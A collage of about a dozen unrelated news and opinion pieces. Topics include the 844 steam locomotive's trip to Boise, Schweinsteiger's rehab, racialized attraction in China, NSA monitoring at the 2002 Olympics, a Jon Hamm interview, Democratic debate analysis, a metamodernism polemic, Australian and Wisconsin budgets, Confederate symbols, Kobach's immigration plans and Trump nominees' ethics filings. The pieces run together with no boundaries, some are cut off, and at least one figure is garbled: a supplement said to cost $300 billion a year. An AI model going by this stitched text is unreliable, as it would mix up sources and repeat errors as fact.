Train lovers call it the “Living Legend” — Union Pacific steam locomotive 844. It was built in 1944, the last of its kind before diesel replaced steam power. Though it changed from running as a high-speed passenger engine to freight service, the locomotive never officially retired and has been part of the Union Pacific fleet of locomotives for 73 years. It has been to Boise a few times, but not since 2010.
The historic locomotive is en route from its home in Cheyenne, Wyo., and will pull into the Boise Depot around 5 p.m. Saturday on a journey called the “Boise Turn Special.” A city celebration the next day — Sunday, April 23 — will mark the 92nd anniversary of the iconic depot.
But many in this community — and beyond — are more interested in the train than its destination.
“There's probably a railfan-following as great as for NASCAR or for people shooting rockets to the moon,” said Bob Jenkins. “We have a hell of an underground.”
Sign Up and Save Get six months of free digital access to The Idaho Statesman
Jenkins, 63, counts himself among that underground.
Jenkins left his home in Wendell on Wednesday to catch up with the 844. The plan: chasing the locomotive from Soda Springs to Pocatello and taking photos along the way. Jenkins doesn't want “roster shots,” or photos that just show the train. He wants photos of the locomotive in a notable setting, like you'd see on an old Union Pacific wall calendar.
Jenkins, who is retired from a career in the Navy, followed the steam locomotive along the Portneuf River with a friend, Army reservist Adam Vogt. Jenkins wanted a shot of the 844 rounding the curve in front of Lava Hot Springs.
“Everyone knows the hot springs. But they haven't seen a steam engine there,” said Jenkins.
After that, they are traveling west, “and get ahead of the 844 as it comes into Gooding,” he added. There, he wants a night shot of the 844 with the grain elevator near the tracks. Then it's on to the Malad River bridge, an old steel and stone bridge near the mouth of the Malad River on the highway between Gooding and Bliss.
“It's hard to get back there, near the bridge, but if you can, you can get a nice shot,” he said.
Finally, he wants to get far enough ahead of the 844 that he can look back and take a photograph of the “sun shining on its nose” as the locomotive continues on toward the Treasure Valley.
Jenkins inherited his love of trains from his mother. Jenkins' dad, a truck driver, gave her a train set one Christmas in Seattle. Jenkins still remembers the sight of the toy train circling the Christmas tree. In the 1960s, when Jenkins was old enough to carry a camera, his dad would drop him off in the Seattle rail yards. Jenkins would roam the yards, alone for hours, taking pictures of trains. Back then, five major lines ran through Seattle. That meant scores of trains of different colors to photograph. Today, Seattle has just two lines: the Union Pacific and the Burlington Northern Santa Fe. Yellow and orange trains, respectively, said Jenkins.
He had wanted to be an engineer, but “Vietnam,” he said, “got in the way.”
He enlisted and became a career Navy man instead, but was eventually able to become an engineer, if in an unexpected way. After retiring, he built and ran a “park train,” or small railroad for children outside Missoula, Mont., for six years.
Sometimes, he meets people who think his love of trains and his determination to drive for miles, just to photograph them against an Idaho backdrop, is odd.
“I just ask them if they like to take pictures of birds or race cars at the racetrack or baseball players at the baseball field. Then, they get my point,” said Jenkins.
Because of his train photography, he “knows just about every foot of track from Soda Springs to La Grande.” He's met people from Japan, Germany — fellow train lovers who have traveled to the U.S. to see them. When he lived in Bliss near the train tracks, his status as an avid railfan was so well-known, the train crews would call him on their radio to let him know they'd be passing by. He'd get their messages on a scanner he kept tuned to the railroad frequency.
Trains have built a community around Jenkins. Ultimately, though, the lure is in the machines themselves. The idea of a single person controlling a milelong train, “and the brute force of them,” he said.
“Steam, unlike diesel, is alive. You see the wheels turning. You smell the smoke. You hear the whistle.”
Every steam whistle has its own melody, he said. Some are high. Some have what Jenkins called a “mid-tone throaty sound that you can hear from miles away.”
Sometimes you could know an engineer just by the way he made the steam whistle, he said.
The whistle on the 844 — one people will likely hear this weekend in the Treasure Valley — is “pretty much in its own world,” said Jenkins. “Like the first time you hear a rattle snake. You just know what it is.”
“When you hear the whistle, you'll know the 844 is coming.”
Get the biggest Manchester United FC stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Bastian Schweinsteiger continued his rehabilitation from a knee injury at Manchester United 's Carrington training complex on Friday.
Schweinsteiger has not played since suffering the injury against Sheffield United last month and was granted a holiday by manager Louis van Gaal .
The 31-year-old headed to Dubai, where he cheered on girlfriend Ana Ivanovic in the WTA Dubai Duty Free Tennis Championships.
Schweinsteiger this week hinted he could be back for United's Europa League round-of-16 first leg in March.
"I should be completely back on board in March," he told Bild. "A medial ligament tear takes time, but everything is healing well. I know my body, everything will be okay.
"In about five days, I'll begin to start running again and five days after that I should be training with a ball again."
Germany international Schweinsteiger was among the morning arrivals following United's Europa League thrashing of Midtjylland on Thursday night.
"If white women were never attracted to Chinese men, then I would not exist."
In January 2012 I sat in a popular south-western Chinese restaurant on Beijing's Beilou Guxiang with two other foreign women. One was a friend and the other was a white woman in her early fifties. She was an acquaintance of my friends from home, on a tour of China.
Across the room from us sat another white woman with her baby, who appeared to be half Chinese. Our companion was having trouble comprehending the situation and so we explained that no doubt the child's father was Chinese, to which she responded “but do you think that is possible?”. I braced myself – what was it about having a Chinese father and a white mother she was going to offer up as an impossibility? She elaborated: ‘well do you find them attractive?' she said with marked incredulity. It was clear that by ‘them' she meant Chinese men. We protested politely – after all she was paying for our dinner – but below the surface my mind was racing. My grandfather is Chinese and my grandmother British, my father half and my mother white.
If white women were never attracted to Chinese men, then I would not exist. My very existence was inconceivable to the woman sitting across from me.
The story of my grandfather's migration from Hong Kong to London came up later in the conversation and I wondered if, in the taxi ride back to her hotel, she had put two and two together and re-assessed the impact of her remarks. I never did find out.
I was reminded of the conversation when several commentaries on inter-racial relationships went viral on the Chinese internet earlier this year. What first caught my attention was Stephanie Naday's piece in the Global Times decrying the dire dating prospects for western women in Shanghai. I was, initially, pleased to see the piece. I think there is a point to be made about the preference some western men have for Chinese women and I was curious to see how Naday dealt with the topic.
However, the piece turned out to be riddled with contradictions and casual racism. Naday, while attempting to make the case for white women's difficulty dating both foreign and Chinese men, characterised the latter as “effeminate” and “small sized”. She also branded Chinese women as “inhibited” and “submissive”. Sadly, her perspective is not uncommon – I often heard similar sentiments from other western women living in China who believed me to be a sympathetic confidant.
I grew up a witness to the effects of this particular brand of highly sexualised racism on members of my family in the UK. I am far from sympathetic, I find it heartbreaking.
Further controversy followed the online resurgence of China based South African Winston Sterzel's vlog entry Are Chinese girls easy?. In the video Sterzel points out that, for foreign men, getting a Chinese girlfriend will depend on your skin colour and nationality in as far as they are perceived to be indicators of wealth. His strategic analysis of how ‘easy' Chinese women are is quite repulsive. And while he is not wrong that who we find attractive is informed by a person's economic status, it would be unfair to brand this as a solely Chinese phenomenon. In the UK, accent, which alerts people to differing social class and wealth, also informs who is found attractive by whom.
What makes the article and the vlog entry interesting is that they raise important points about the racialized state of who is and is not deemed attractive – points that are rarely talked about openly in more liberal circles. Naday and Sterzel stumbled upon an important social phenomenon, though they did not attempt to fully explain it or call it out as the mixture of racism, sexism and classism that it is. All the same they provided a much-needed window for discussion.
One particular expat confided in me that she did not find Chinese men attractive because of her relative equality with them in terms of physical strength – she imagined that they would not be strong enough to overpower her.
Sexual attraction is not an isolated compulsion, but directly connected to the way our societies deal with gender, race and class and we need to talk about it.
Buried near the bottom of an explosive Wall Street Journal exposé about the spying capabilities of the NSA is a fascinating tidbit about the breadth of surveillance operations before and during the 2002 Salt Lake City Olympics.
For the 2002 Winter Olympics in Salt Lake City, officials say, the Federal Bureau of Investigation and NSA arranged with Qwest Communications International Inc. to use intercept equipment for a period of less than six months around the time of the event. It monitored the content of all email and text communications in the Salt Lake City area.
Huh, makes you wonder whether they knew about the whole pairs figure skating scandal ahead of time.
The Salt Lake City Olympics opened five months after 9/11. Even before those attacks, security was going to be at an all-time high. After that day, measures were ramped up even more. The Secret Service secured areas for events, all foreign visitors were checked on a watch list, F-16s were on constant alert and all law and military agencies operated from the same command center for the first time . Given the climate of fear at the time, spectators likely would have consented to full-body searches to get into events.
Still, the idea that the NSA was intercepting everything, as the WSJ reports, is distressing, if not altogether surprising.
'The best thing about children? Giving them back': Mad Men star Jon Hamm on what he's learned from playing a harassed father
Jon Hamm stars alongside his partner of 15 years Jennifer Westfeldt who also wrote the script for Friends With Kids
Mad Men star Jon Hamm is unmarried and childless — so did starring in a film about children with his long-term partner finally make the actor who plays Don Draper broody?
‘Not really — I'm a big fan of other people's children — I think they're awesome,' laughs Hamm who stars in Friends With Kids with Jennifer Westfeldt.
They have been together 15 years, but are not married and have no kids themselves.
‘What I like about other people's children is giving them back.
'But having children is a commitment — definitely a commitment. That said, having kids is something we've never ruled out
The film spotlights two pals who see their friends' marriages dissolve after having kids — so they try to avoid the same fate . . . by having a baby together while vowing to continue their search for their soulmates.
Westfeldt not only wrote the film script, she also makes her directorial debut and stars as Julie, a thirtysomething single woman who opts to have a child with her platonic best friend Jason, played by Adam Scott.
Hamm plays harassed dad Ben and the idea for the plot came from the couple's real-life experiences.
‘Our friends started having babies and everything became so kid-centric,' admits Hamm, 41.
‘You feel a little bit left behind and you think: “Oh s**t. Are we doing something wrong?” That was how it started.
‘Then Jen wrote a great script that happened to be really funny, very real and yet heartbreaking.
‘We saw what was happening with our friends, from feeling outside that because you don't have as much in common.
'You can't compare notes about “Did he sleep through the night?” or “Is he colicky?” We ended up only seeing our friends at baby showers or birthday parties.'
It is the first film the pair have made through their new company, Points West Pictures. ‘It's a high-stress environment, but it's for a very short amount of time.
Comedy cast: The Bridesmaids cast Chris O'Dowd, Maya Rudolph, Kristen Wiig and Jon Hamm are back together on screen in the new film Friends With Kids
‘At the end of the day, at least you have each other to fall back on,' says Hamm, who was also a co-producer.
Does he think the theme of the film was a hint from Westfeldt? ‘Not at all. If Jennifer wants to get a message to me she can just walk over and talk to me, she doesn't need to raise several million dollars and make a movie about it.
‘When people ask: “Why don't you get married?” or “Why don't you have kids?” I usually say you don't need to be an astronaut to tell a good story about outer space. We're very comfortable with our relationship the way it stands.'
Friends With Kids may not have turned Hamm into a wannabe dad, but he did at least pick up some tips on how to cope with children: ‘The most important thing I learnt about kids is how to shut them up by handing them a mobile with the Angry Birds game. It was unbelievable!'
Michael Grunwald is a senior staff writer for Politico Magazine.
In the eighth year of the Barack Obama administration, it's not surprising that the Republican debates have portrayed America as a fallen wasteland of broken dreams. But last night, the Democratic candidates sounded almost as gloomy about the country they hope to lead, even as they lavished praise on the Democrat who's currently leading it.
Bernie Sanders, the crotchety socialist who was probably born in a bad mood 74 years ago, was even more relentlessly negative than usual, making the U.S. economy sound like an oy-vey sequel to The Grapes of Wrath. He bemoaned how “almost everyone is getting poorer,” how ordinary Americans are “worried to death about the future of their kids,” how “there is massive despair all over this country.” He spoke of seniors who are “cutting their pills in half…don't have decent nutrition…can't heat their homes in the wintertime.” He complained that a rigged economic system and a corrupt political system have created “a moment of serious crises”—an unemployment crisis, health insurance crisis, infrastructure crisis, child poverty crisis, and a dispiriting sense that our crippling problems can't be solved.
Story Continued Below
Hillary Clinton, the mainstream Democrat who served in the Obama Cabinet, did not push back against this dystopic vision of a nation in pain. She repeatedly pointed out that she agrees with Sanders that too many Americans are getting left behind, that “yes, the economy is rigged in favor of those at the top.” Her main critique of the Sanders critique was that it lacked identity-politics specificity, that it didn't recognize the unique challenges of “really systemic racism” against blacks, of “hardworking immigrant families living in fear,” of women's rights that are “under tremendous attack,” of “discrimination against the LGBT community,” even of the struggles in coal country and other downtrodden white communities “where we are seeing an increase in alcoholism, addiction, earlier deaths.”
Perhaps this doom-and-gloom-a-thon was predictable after Sanders and Donald Trump rode their messages of malaise to victory in New Hampshire, which had a 3 percent unemployment rate to go along with America's lowest murder rate and poverty rate. Today, only one quarter of Americans believe the country is on the right track. Still, it was striking that after a record 71 months of employment growth that have created 14 million new jobs, at a time when gasoline is cheap and health care inflation is at the lowest level in half a century and the federal deficit has dropped by more than two thirds, the party in power was essentially embracing the Republican view of America as a dumpster fire.
It was just as striking to hear Sanders and Clinton interrupt their depressing colloquies about the state of the country with gushing compliments for its leader. Obama has sky-high approval ratings among Democrats, and Clinton repeatedly wrapped herself in the Obama mantle, calling Hillarycare a precursor to Obamacare, praising his executive actions on immigration, boasting about her role in his nuclear deal with Iran as well as his decision to authorize the raid on Osama bin Laden. She also repeatedly accused Sanders of insufficient loyalty to the president—for criticizing his leadership, for downplaying his Wall Street reforms, for calling for a primary challenge in 2012, even for providing a blurb for a book portraying Obama as a disappointment to progressives. “The kind of criticism that we've heard from Senator Sanders about our president, I expect from Republicans,” she said. “I do not expect it from someone running for the Democratic nomination.”
Sanders reacted more vehemently to that accusation of disloyalty than he has reacted to anything Clinton has said in any of their debates. “Madam Secretary, that is a low blow,” he said. “It is really unfair to suggest that I have not been supportive of the president. I have been a strong ally of his on virtually every issue.” Sanders launched his own fiery defense of Obama's record, arguing the president has done an “extraordinary job” after inheriting an economy losing 800,000 jobs a month, a $1.4 trillion deficit, and a collapsing financial system. “As a result of his efforts and Joe Biden's efforts against unprecedented, unprecedented Republican obstructionism, we have made enormous progress,” Sanders said. He also pointed out that Clinton has not always been such an Obama fan: “One of us ran against Barack Obama. I was not that candidate.”
It is not necessarily inconsistent to argue that the country has made a lot of progress since the depths of the Great Recession and also that the progress has been insufficient. And the Democrats did not go nearly as far as Republicans have gone in describing the entire world as a chaotic nightmare that threatens our safety, a key element of the GOP case for a departure from the Obama era. But Republicans must be enjoying the spectacle of Democrats echoing their view of the economy—that it's much worse than the 4.9 percent jobless rate suggests, that the middle class is getting crushed, that Americans have, as Clinton said, “good cause” to be angry—while simultaneously emphasizing their admiration of Obama. If 2016 is going to be an election about change, about Making America Great Again, it's hard to see how that landscape favors Obama-loving Democrats.
And let's face it: This is mostly a problem for Clinton. Sanders is perfectly comfortable as Chicken Little, campaigning with left-wing Obama critics like Cornel West, thundering about a nation getting devoured by “suicide, alcoholism, drugs.” If America is in crisis, if “we need to start paying attention to the needs of working families in this country,” then the Sanders argument that we also need a political revolution makes sense. It's tougher to mobilize around the Clinton argument, which is that America is in crisis but we basically need to stay the course. There was a telling moment last night when Clinton argued that the slew of individual donors supporting her as well as Sanders “demonstrates the strength of the support we have among people who want to see change in our country.” In 2016, the candidate who served under Obama and supports just about all of Obama's policies does not look like the candidate of change.
Of course, it's possible that Clinton would be able to shift her message in a general election, to focus more on the progress America has made in adding jobs, reducing oil imports and carbon emissions, covering the uninsured, raising graduation rates, and bringing home soldiers since January 2009. Obama's approval rating has climbed to 50 percent, and the Republican candidates remain unpopular, so it's possible that the specter of Trump or Ted Cruz or another Republican in the White House would make the electorate feel better about the current direction of the country. For now, though, the candidates of both parties are spending their time on national television telling Americans the country is in shambles. The problem for Democrats is that Americans may believe them.
by Philip Damico
The metamodern movement and in turn The Metamodernist blog arose in reaction and opposition to the postmodern era. This article will explain and define postmodernism and analyze it from a metamodern perspective.
Postmodernism arose in the mid 20th century as a movement that subverted modernism in social discourse, literature, architecture, philosophy and cultural criticism. It manifested itself in different ways – obviously postmodern architecture has little in common with postmodern philosophy but for the most part the movement shares a singular overarching idea: that truth, knowledge and reality are constructs wrought throughout the history of social, political and cultural interactions between humanity. Let's unpack that by discussing the postmodern approach to various institutions and ideas.
For example, a postmodernist might assert that morality is subjective. Modernism and premodernism placed an emphasis on good vs bad in art and narratives, i.e. the Christians fighting against the Muslims to regain Jerusalem during the Crusades.
Postmodernism politics and philosophy place an emphasis on contextualizing or giving perspective to dogma. For example, in the modern era of objective truth and moral absolutism, the general mores that came with the era lended themselves more towards the rejection of religious outsiders because people took their religions to be the only moral guidelines or grand narratives and all others were incorrect. The postmodern era ushered in an attitude that all religious beliefs are to be respected and accepted. This appears an honorable pursuit at first glance. However, when put into practice, the idea can result in seriously detrimental cultural and political effects. Hypothetically, if a country run by postmodern politicians were experiencing an influx of immigration from a region where the dominant religion supported rape, and occurrences of rape skyrocketed, they might not do anything about the issue on the basis that morality is constructed and every culture has a right to expression of their beliefs. This is both an extreme and large scale example but postmodern thought has reached its way into many facets of our thought processes and social interactions and worldviews and we are affected by it in more ways than we know.
Postmodern moral relativism and deconstruction of absolute truths have not only found their way into our social and political interactions but they've also permeated artistic expression. The foremost artforms affected are painting, sculpting and writing. Before the era of postmodernism in art, experimentation remained within the bounds of accepted structures. An experimental book would, rather than experimenting with what a book is, include atypical content, e.g. controversial topics. The postmodern novel experiments with the structure of the novel itself. Christopher Keep of the University of Western Ontario writes: “Among the modernist devices which [postmodern literature] pushes to a new extreme are: the rejection of mimetic representation in favour of a self-referential “playing” with the forms, conventions and icons of “high art” and literature; the rejection of the cult of originality in recognition of the inevitable loss of origin in the age of mass production; the rejection of plot and character as meaningful artistic conventions; and the rejection of meaning itself as delusory.” So it would seem that the realities presented within postmodern literature are not unlike the reality (or realities) postmodernity presents to us in that they are unreliable and inconsistent just as postmodernism supports the idea that reality is subjective. Characteristics of postmodern literature include maximalism, the practice of overdescriptive and tangential passages that leave the reader disoriented, and fragmentation, the practice of creating a chaotic atmosphere and strcture that reflects the postmodern state of the world. Notable postmodern novels include Finnegans Wake by James Joyce, Gravity's Rainbow by Thomas Pynchon, Slaughterhouse Five by Kurt Vonnegut and David Foster Wallace's Infinite Jest.
Postmodern painting and sculpture follow the same general idea of subverting what came before when what came before was a focus on recreating reality.
I've now introduced you to what postmodernism is and how it appears in art and everyday life. It might not seem so bad, perhaps even an interesting movement that contributes some valuable ideas to the pantheon of ideology. But that is not the case. Postmodernism in action instills within us crippling inaction both on a personal and large scale and a sense of helplessness that it offers no cure for. Why should the postmodernist go on when their beliefs have convinced them that their actions are worth nothing, only to be wiped away and forgotten by all that come after them? The postmodernist is gripped by apathy and will soon find themselves unable to see the point in progressing their own interests or that of their nation or ideology due to a newfound sense of perspective that at first is freeing but soon reveals itself to be a trap. Postmodernists are caught in the realization that all beliefs and schools of thought are equally “true” as all others, which proves to be completely unhelpful as they cannot choose what to do when all viewpoints are suddenly on the same playing field.
A common postmodern reaction to the horrors from which it was birthed is to embrace them with irony, parody and satire. The postmodern era deconstructed narratives in reality by completely devaluing ideology and turning grand narratives into a shell of what they once were, and this deconstruction seeped into popular culture. Internet memes are a postmodern method of deconstructing ideals as they attack anything and everything, shutting down sincere attempts to communicate and discuss with jeering commentary.
The postmodernist quickly becomes either paralyzed, decadent or reactionary. We see examples of all 3 every day and on many levels. Our peers, celebrities and politicians have fallen prey to the postmodern mindset of cynicism and apathy that has left our society anemic and gasping for breath.
This is where metamodernism comes in. The movement aims to resurrect grand narratives, regain focus on political and social values that postmodernism pointed us away from without us even realizing it while retaining the admittedly useful aspects of postmodernism as we move on to a new era of thought that will save our civilization from postmodern apathy as it continues to take over our collective psyche. Postmodernism is an abyss. It boasts “I am freedom, I will liberate you,” while all along it plans to trap you alone in the dark.
Advertisements
It is due to breach the ceiling in 10 days' time on December 12. It is understood Mr Hockey wants to know what conditions the Greens would demand in return for an agreement to scrap the ceiling. So far, he has received no reply. Labor has refused to back a Coalition bill that would lift the ceiling to the $500 billion the Treasury says it will need at some time in the next three years. It says it will agree only to an interim increase to $400 billion. Greens leader Christine Milne. Credit:Katherine Griffiths A spokeswoman for Mr Hockey flagged the prospect of a deal with the Greens, saying he was trying ''to bring some reason to the issue because there is a growing urgency around the operation of government and the impact on financial markets''. Complicating the approach are remarks made by Prime Minister Tony Abbott during the election campaign referring to the Greens as ''economic fringe dwellers''. The Coalition promised during the campaign to repay the debt and to return the budget to a surplus of 1 per cent of GDP ''within a decade''.
But an analysis prepared by the respected Canberra consultancy Macroeconomics ahead of this month's official update finds budget deficits all the way out until 2026-27, with no end in sight beyond that. Whereas the official pre-election update pointed to a small surplus of $4.2 billion in 2016-17, Macroeconomics predicts a deficit of $6.6 billion in that year climbing to a deficit of around $18 billion in 2020-21 and each year thereafter. This year Macroeconomics predicts a deficit of $33 billion, suggesting the budget has deteriorated $2.2 billion from an update released in August. The extra funds will necessitate more borrowing along with the $8.8 billion the Treasurer is sourcing to top up the Reserve Bank's reserve fund. Stephen Anthony, the former Treasury and Finance Department specialist who heads Macroeconomics, says he factored in a more rapid slide in minerals prices than has the Treasury. ''All Australian governments should take precautionary measures
to prepare for the end of the mining investment phase of the China boom,'' he said. ''Without the China boom from 2004, Australia's fiscal position would be more akin to that of the United States.'' The new government should ''cut early and cut hard''. The Howard government cut spending by 0.5 per cent of gross domestic product in its first budget and 1.2 per cent in its second. Cuts of that order today would save $8 billion and $16 billion. Dr Anthony said it would have to attack corporate welfare and middle and upper-class welfare, ''especially assistance to the aged''. The Senior's Supplement paid to retirees too well off to get the pension cost $300 billion per year. Family Tax Benefit B goes to families ''where one parent chooses to stay at home and look after the children'' and costs $500 million more than it would if the threshold was cut to a generous $100,000. Loading
Removing the Clean Energy Household Assistance Package and unwinding the associated income tax cuts would save save $5 billion a year. ''Without a carbon price there is little need for the package,'' Dr Anthony said.
ASHWAUBENON, Wis.  Gov. Scott Walker signed his first budget Sunday, a plan that plugs the state's $3 billion shortfall but also slashes funding for public schools and the University of Wisconsin System.
Walker signed the two-year $66 billion budget at a private ceremony at a Green Bay area manufacturing company. The budget passed the Legislature without a single Democratic vote.
It fulfills Walker's campaign pledge to balance the budget without raising taxes. He released just 50 vetoes early Sunday morning, signaling the Republican-controlled Legislature had given him almost everything he wanted when lawmakers revised the document. Democratic Gov. Jim Doyle issued 81 vetoes with the 2009-11 budget, his last before leaving office.
"As a state, we can choose to take the easy road and push off the tough decisions and pass the buck to future generations, or we can step up to the plate and make the tough decisions today," Walker said in prepared remarks. "Our budget chooses to fix our problems now, so that our children and our grandchildren don't face the same challenges we face today.
Democrats argue a $70 million reduction in tax breaks for some who qualify for the federal Earned Income Tax Credit, as well as limits on a homestead exemption for poor homeowners and renters, amounted to tax increases.
Click on the video player below to watch a YouTube post by CBS Affiliate WISC correspondent Jessica Arp, showing protesters outside the location where Walker was privately signing the budget.
But no matter how it's spun, passage of the budget and Walker's signing of it before the new fiscal year starts on July 1 is a significant achievement for Republicans who control both houses of the Legislature.
They worked quickly to approve the budget before recall elections in August that could result in Democrats gaining a majority in the Senate and the power to block Walker and the GOP's agenda.
Democrats assailed the budget as an attack on middle class values since it cuts funding for public schools by $800 million, reduces funding to the UW system by $250 million and cuts tax credits for poor people.
It also reduces the amount schools can collect from property taxes and other revenue combined, which translates into another education cut of about $800 million. While schools are seeing deep cuts, Walker's budget extends tax breaks to manufacturers, multistate corporations and investors.
The budget also calls for $500 million in unspecified cuts to Medicaid programs, puts an enrollment cap on the popular Family Care program and increases spending on the state's roads.
There are no sales or income tax increases and property taxes are held essentially flat over the next two years.
The budget also expands Milwaukee's school voucher program to suburban schools in Milwaukee County and to the city of Racine, ends Doyle's Wisconsin Covenant financial aid program for college-bound students and cuts aid for technical colleges by 30 percent.
First, the concept of race is very fungible. Rachel Dolezal, Verda Byrd, and passers in just about every "race" proves that race is, in fact, a social construct. While melanin and certain physical attributes may seem definitive, the exceptions always make the arguments moot.
Secondly, while all "races" can be racist, not all are racist with power. In the aggregate, it is unidirectional. If there is any doubt whatsoever, make an attempt to name a law that in the aggregate negatively affects the majority population.
Things are moving pretty fast. Confederate flags are coming down, and Confederate statues seem to be the next target. In Houston and other cities, schools with the names of Confederate heroes are being targeted as well.
The phrase don't waste a good crisis comes to mind. And it seems all the activists are ready to decimate what's left in the virtual cocoon of the Confederacy.
In a rather strange way, could the speed of these events be the seed to the race war Dylann Roof was seeking? To be clear, Dylann Roof did not have the capacity of multidimensional thinking, as his manifesto clearly proved. However, the anger and impotence being felt by those with feeble minds, those who believe their values and their imaginary supremacy are symbolized by that Confederate flag and their Confederate heroes ... in their minds, what do they have left. They are well-armed and many may feel they have nothing to lose. To them, it is the civil war all over again.
To be clear, the Confederate flag is a symbol of hate. The Confederate heroes fighting under that flag were fighting to keep a people enslaved under the false tenet of states' rights. It was an evil endeavor.
But before those from outside the Confederacy get on their high horses, they must remember that racism is not a Southern thing. It is an American thing. Busing in Boston, riots in Watts, to name but two, are probative.
Concentrating on Confederate symbols does little to solve the real racial problems that afflict the country. For if and when the Confederate flags are gone, if and when the Confederate statues are gone, and if and when the Confederate-named structures are renamed, the scourge of income, wealth, and racial disparities will remain.
Again, the phrase don't waste a good crisis applies. We must all realize that above and beyond this tragedy, we are being played.
Is this Charleston tragedy being used to play us all? Twenty-six innocent Americans were murdered in Sandy Hook. Very little was done to mitigate that tragedy. Nine innocent Americans died in Charleston. Is much really happening? Or is it just a semblance of much? A decoy?
While we necessarily take our eyes off the ball for this tragedy, we must ensure that we do not allow the plutocracy to change the nation's conversation. We must be vigilant.
We must rid ourselves of the Confederate flag. We must rid ourselves of the pain of the Confederacy. We must keep the doors open for those who feel unjustifiably lost for something they really never had. We allow the atonement for those seeking atonement for their knowing or unknowing bad deeds.
We cannot, however, allow the systemic structural failure of our economy and society to be defined, encapsulated, or deflected solely or mostly as a racial problem. For it is that social construct that has continued to suck the power out of us as it preys on our irrational fears.
NEW YORK/WASHINGTON (Reuters) - An architect of anti-immigration efforts who says he is advising President-elect Donald Trump said the new administration could push ahead rapidly on construction of a U.S.-Mexico border wall without seeking immediate congressional approval.
Kansas Secretary of State Kris Kobach talks in his Topeka, Kansas, U.S., office May 12, 2016. REUTERS/Dave Kaup/File Photo
Kansas Secretary of State Kris Kobach, who helped write tough immigration laws in Arizona and elsewhere, said in an interview that Trump's policy advisers had also discussed drafting a proposal for his consideration to reinstate a registry for immigrants from Muslim countries.
Kobach, who is a media reports say is a key member of Trump's transition team, said he had participated in regular conference calls with about a dozen Trump immigration advisers for the past two to three months.
Trump's transition team did not respond to requests for confirmation of Kobach's role. The president-elect has not committed to following any specific recommendations from advisory groups.
Trump, who scored an upset victory last week over Democrat Hillary Clinton, made building a wall on the U.S.-Mexico border a central issue of his campaign and has pledged to step up immigration enforcement against the country's 11 million undocumented immigrants. He has also said he supports “extreme vetting” of Muslims entering the United States as a national security measure.
Kobach told Reuters last Friday that the immigration group had discussed drafting executive orders for the president-elect's review “so that Trump and the Department of Homeland Security hit the ground running.”
To implement Trump's call for “extreme vetting” of some Muslim immigrants, Kobach said the immigration policy group could recommend the reinstatement of a national registry of immigrants and visitors who enter the United States on visas from countries where extremist organizations are active.
Kobach helped design the program, known as the National Security Entry-Exit Registration System, while serving in Republican President George W. Bush's Department of Justice after the Sept. 11, 2001, attacks on the United States by al Qaeda militants.
Under NSEERS, people from countries deemed “higher risk” were required to undergo interrogations and fingerprinting on entering the United States. Some non-citizen male U.S. residents over the age of 16 from countries with active militant threats were required to register in person at government offices and periodically check in.
NSEERS was abandoned in 2011 after it was deemed redundant by the Department of Homeland Security and criticized by civil rights groups for unfairly targeting immigrants from Muslim- majority nations.
Kobach said the immigration advisers were also looking at how the Homeland Security Department could move rapidly on border wall construction without approval from Congress by reappropriating existing funds in the current budget. He acknowledged “that future fiscal years will require additional appropriations.”
Congress, which is controlled by Trump's fellow Republicans, could object to redirecting DHS funds designated for other purposes.
HELPED DRAFT TOUGH ARIZONA LAW
Kobach has worked with allies across the United States on drafting laws and pursuing legal actions to crack down on illegal immigration.
In 2010, he helped draft an Arizona law that required state and local officials to check the immigration status of individuals stopped by police. Parts of the law, which was fiercely opposed by Hispanic and civil rights groups, were struck down by the U.S. Supreme Court in 2011.
Kobach was also the architect of a 2013 Kansas law requiring voters to provide proof-of-citizenship documents, such as birth certificates or U.S. passports, when registering for the first time. A U.S. appeals court blocked that law after challenges from civil rights groups.
Kobach said in the interview he believed that illegal immigrants in some cases should be deported before a conviction if they have been charged with a violent crime. Trump said in an interview on CBS' “60 Minutes” that aired on Sunday that once he took office, he would remove immigrants with criminal records who are in the country illegally.
Kobach said the immigration group had also discussed ways of overturning President Barack Obama's 2012 executive action that has granted temporary deportation relief and work permits to more than 700,000 undocumented people or “dreamers” who came to the United States as children of illegal immigrants.
Among those who had gathered at Marvin Miller's memorial at New York University on Monday were many players who owed their economic prosperity to him, labor lawyers who idolized him, and agents who owed their careers to him.
He was remembered on Monday as the man who had helped baseball players gain their rights — among them free agency and a robust pension — and in doing so had revolutionized sports labor relations. Miller, who died on Nov. 27 at age 95 from liver cancer, became the executive director of the Major League Baseball Players Association in 1966, reconfigured the union and built it into the most powerful in sports and one of the most powerful labor bodies in the United States.
“We're here to honor, and this is not an exaggeration, a giant of American labor,” Michael Weiner, the association's current executive director, said. “In our little own world of baseball, there's no one that's had as much influence in the last 50 years than Marvin Miller.”
While Miller was the public face of the cause, many of the former players — including Hall of Famers Dave Winfield and Joe Morgan — recounted that he always reminded players that it was their union.
WASHINGTON ― Senate confirmation hearings for President-elect Donald Trump's Cabinet picks are set to begin just hours from now. But four of the nine Trump nominees scheduled for hearings this week still haven't disclosed key financial information to the Office of Government Ethics, which is charged with making sure they don't break federal ethics laws.
Of the four nominees who had not submitted their ethics paperwork as of Monday afternoon, two of them ― Commerce Secretary-designate Wilbur Ross and Education Secretary-designate Betsy DeVos ― are billionaires who have never worked in government.
“The announced hearing schedule for several nominees who have not completed the ethics review process is of great concern to me,” Office of Government Ethics director Walter Shaub wrote in a letter to Senate Democratic Leader Chuck Schumer (N.Y.) and Sen. Elizabeth Warren (D-Mass.) on Saturday. It would “be cause for alarm,” Shaub added, “if the Senate were to go forward with hearings on nominees whose reports OGE has not certified.”
The other two nominees who haven't yet submitted financial disclosures are former Republican presidential candidate Dr. Ben Carson, picked to run the Department of Housing and Urban Development, and retired Marine Corps Gen. John Kelly, chosen to head the Department of Homeland Security. Neither man is nearly as wealthy as Ross or DeVos.
Until 2015, Kelly received a salary from the U.S. Marine Corps and was effectively prohibited from drawing income from the private sector. Carson already submitted detailed financial disclosure forms to the Federal Election Commission as part of his presidential campaign. They reveal that Carson's wealth is derived largely from speaking fees and book sales.
The Trump nominees' failure to fully comply with the normal procedure for ethics vetting prior to their confirmation hearings is raising alarm bells for the OGE and independent ethicists. Federal law requires presidential nominees to divest holdings that may conflict with their official duties. The OGE works with presidential transition teams to ensure that the incoming nominees avoid potential violations of criminal conflict-of-interest laws. This process “stops potential conflicts from becoming actual conflicts,” the agency tweeted on Thursday.
“It's enormously concerning that these nominees haven't submitted their financial disclosures,” said Brendan Fischer, a lawyer at the nonprofit Campaign Legal Center. “OGE has traditionally viewed itself as a resource for nominees, working with them to resolve issues. It's not supposed to be an adversary.”
